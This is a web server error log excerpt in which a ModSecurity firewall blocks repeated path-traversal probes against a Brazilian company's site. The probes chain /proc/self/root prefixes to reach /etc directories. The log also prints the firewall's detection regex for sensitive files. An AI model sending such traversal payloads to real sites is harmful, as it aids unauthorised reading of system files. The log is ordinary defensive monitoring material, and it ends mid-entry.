[Wed Mar 18 10:23:06.623199 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:46264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnOta6ubjKNq_cu4aVUwAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:09.298605 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:46278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnPeyqAr6etmhZHNq7hgAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:10.659740 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:58758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnPsdf6f5d65gmYZTRmQAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:12.056712 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:58766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnQPu8EFLIOrSqIpsAeAAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:13.381509 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:58770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnQUzinOy1jxa1j4cRQAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:14.691425 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:58772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnQsdf6f5d65gmYZTRmwAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:16.037386 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:58778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnRNY0UrI5A3LftIyihQAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:17.405866 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:58784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnReoXxyEfFpUF8f9p5AAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:23.814876 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:58786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnS9a6ubjKNq_cu4aVYQAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:23:25.164673 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:47362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnTew_le52K8_3pV3bqgAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:23:26.447506 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:47366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnTta6ubjKNq_cu4aVZgAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:23:29.868900 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:47376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnUew_le52K8_3pV3brgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:30.341830 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.244.43:43216] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqnUuw_le52K8_3pV3brwAAAhA"]
[Wed Mar 18 10:23:32.023235 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.228.61:50690] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqnVPu8EFLIOrSqIpsAiAAAAkw"]
[Wed Mar 18 10:23:50.128641 2026] [mime_magic:error] [pid 17653:tid 140411649607424] (70014)End of file found: [client 57.141.18.50:42266] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:24:06.950640 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:39506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqndtY0UrI5A3LftIyi2QAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:24:45.843287 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:34350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnndY0UrI5A3LftIyjCQAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:47.158380 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:33224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnn9a6ubjKNq_cu4aViwAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:47.489156 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:56472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnnymAPhZkrhU8w4lo0QAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:48.557224 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.241.31:51638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnoEzinOy1jxa1j4cRjQAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:51.291403 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:51650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnocdf6f5d65gmYZTR3gAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:52.683168 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:51656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnpNY0UrI5A3LftIyjDAAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:54.611425 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:36450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnpew_le52K8_3pV3b5QAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:24:54.616574 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:51666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 